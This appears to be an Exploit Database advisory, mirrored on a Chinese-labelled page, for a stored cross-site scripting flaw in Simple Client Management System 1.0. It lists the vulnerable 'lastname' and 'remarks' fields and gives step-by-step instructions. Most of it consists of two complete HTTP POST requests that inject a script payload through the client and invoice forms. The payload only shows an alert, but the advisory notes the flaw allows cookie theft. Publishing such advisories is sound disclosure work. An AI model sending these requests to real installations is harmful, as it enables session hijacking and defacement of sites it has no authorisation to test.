Simple Client Management System 1.0 – ‘multiple’ Stored Cross-Site Scripting (XSS)

• Exploit Database
• 17 阅读

• 作者： Sentinal920
  日期： 2021-11-08
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/50498/

• # Exploit Title: Simple Client Management System 1.0 - 'multiple' Stored Cross-Site Scripting (XSS)
  # Exploit Author: Sentinal920
  # Date: 5-11-2021 
  # Category: Web application
  # Vendor Homepage: https://www.sourcecodester.com/php/15027/simple-client-management-system-php-source-code.html
  # Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/cms.zip
  # Version: 1.0
  # Tested on: Kali Linux
  # Vulnerable page: client,invoice
  # Vulnerable Parameters: "lastname", "remarks"
  
  Technical description:
  A stored XSS vulnerability exists in the Simple Client Management
  System. An attacker can leverage this vulnerability in order to run
  javascript on the web server surfers behalf, which can lead to cookie
  stealing, defacement and more.
  
  Steps to exploit:
  1) Navigate to http://localhost/cms/admin/?page=client
  2) Click on add new client
  3) Insert your payload in the "lastname" parameter or the "description" parameter
  4) Click save
  
  Proof of concept (Poc):
  The following payload will allow you to run the javascript -
  <script>alert(1)</script>
  
  
  
  1) XSS POC in Add New Client
  -----------------------------
  
  POST /cms/classes/Master.php?f=save_client HTTP/1.1
  Host: localhost
  Content-Length: 1026
  sec-ch-ua: "Chromium";v="93", " Not;A Brand";v="99"
  Accept: application/json, text/javascript, */*; q=0.01
  Content-Type: multipart/form-data;
  boundary=----WebKitFormBoundaryIBW1SfSFiXMKK7Nt
  X-Requested-With: XMLHttpRequest
  sec-ch-ua-mobile: ?0
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
  AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82
  Safari/537.36
  sec-ch-ua-platform: "Windows"
  Origin: http://localhost
  Sec-Fetch-Site: same-origin
  Sec-Fetch-Mode: cors
  Sec-Fetch-Dest: empty
  Referer: http://localhost/cms/admin/?page=client/manage_client
  Accept-Encoding: gzip, deflate
  Accept-Language: en-US,en;q=0.9
  Cookie: PHPSESSID=g1copl50hh7e2c8m1kenc0vikn
  Connection: close
  
  
  ------WebKitFormBoundaryIBW1SfSFiXMKK7Nt
  Content-Disposition: form-data; name="lastname"
  
  <script>alert(1)</script>
  ------WebKitFormBoundaryIBW1SfSFiXMKK7Nt
  Content-Disposition: form-data; name="firstname"
  
  anything
  ------WebKitFormBoundaryIBW1SfSFiXMKK7Nt
  Content-Disposition: form-data; name="middlename"
  
  anything
  ------WebKitFormBoundaryIBW1SfSFiXMKK7Nt
  Content-Disposition: form-data; name="gender"
  
  Male
  ------WebKitFormBoundaryIBW1SfSFiXMKK7Nt
  Content-Disposition: form-data; name="dob"
  
  2021-11-03
  ------WebKitFormBoundaryIBW1SfSFiXMKK7Nt
  Content-Disposition: form-data; name="contact"
  
  xxxxxxxxxx
  ------WebKitFormBoundaryIBW1SfSFiXMKK7Nt
  Content-Disposition: form-data; name="address"
  
  xxxxxx
  ------WebKitFormBoundaryIBW1SfSFiXMKK7Nt
  Content-Disposition: form-data; name="email"
  xxxx@xxx.com
  ------WebKitFormBoundaryIBW1SfSFiXMKK7Nt
  Content-Disposition: form-data; name="avatar"; filename=""
  Content-Type: application/octet-stream
  
  
  ------WebKitFormBoundaryIBW1SfSFiXMKK7Nt--
  
  
  
  2) XSS POC in Add New Invoice
  -----------------------------
  
  POST /cms/classes/Master.php?f=save_invoice HTTP/1.1
  Host: localhost
  Content-Length: 1032
  sec-ch-ua: "Chromium";v="93", " Not;A Brand";v="99"
  Accept: application/json, text/javascript, */*; q=0.01
  Content-Type: multipart/form-data;
  boundary=----WebKitFormBoundaryEk0iOWhhoA0lApXo
  X-Requested-With: XMLHttpRequest
  sec-ch-ua-mobile: ?0
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
  AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82
  Safari/537.36
  sec-ch-ua-platform: "Windows"
  Origin: http://localhost
  Sec-Fetch-Site: same-origin
  Sec-Fetch-Mode: cors
  Sec-Fetch-Dest: empty
  Referer: http://localhost/cms/admin/?page=invoice/manage_invoice
  Accept-Encoding: gzip, deflate
  Accept-Language: en-US,en;q=0.9
  Cookie: PHPSESSID=g1copl50hh7e2c8m1kenc0vikn
  Connection: close
  
  ------WebKitFormBoundaryEk0iOWhhoA0lApXo
  Content-Disposition: form-data; name="id"
  
  
  ------WebKitFormBoundaryEk0iOWhhoA0lApXo
  Content-Disposition: form-data; name="client_id"
  
  1
  ------WebKitFormBoundaryEk0iOWhhoA0lApXo
  Content-Disposition: form-data; name="service_id[]"
  
  1
  ------WebKitFormBoundaryEk0iOWhhoA0lApXo
  Content-Disposition: form-data; name="price[]"
  
  250
  ------WebKitFormBoundaryEk0iOWhhoA0lApXo
  Content-Disposition: form-data; name="discount_perc"
  
  0
  ------WebKitFormBoundaryEk0iOWhhoA0lApXo
  Content-Disposition: form-data; name="discount"
  
  0
  ------WebKitFormBoundaryEk0iOWhhoA0lApXo
  Content-Disposition: form-data; name="tax_perc"
  
  0
  ------WebKitFormBoundaryEk0iOWhhoA0lApXo
  Content-Disposition: form-data; name="tax"
  
  0
  ------WebKitFormBoundaryEk0iOWhhoA0lApXo
  Content-Disposition: form-data; name="total_amount"
  
  250
  ------WebKitFormBoundaryEk0iOWhhoA0lApXo
  Content-Disposition: form-data; name="remarks"
  
  <script>alert(1)</script>
  ------WebKitFormBoundaryEk0iOWhhoA0lApXo--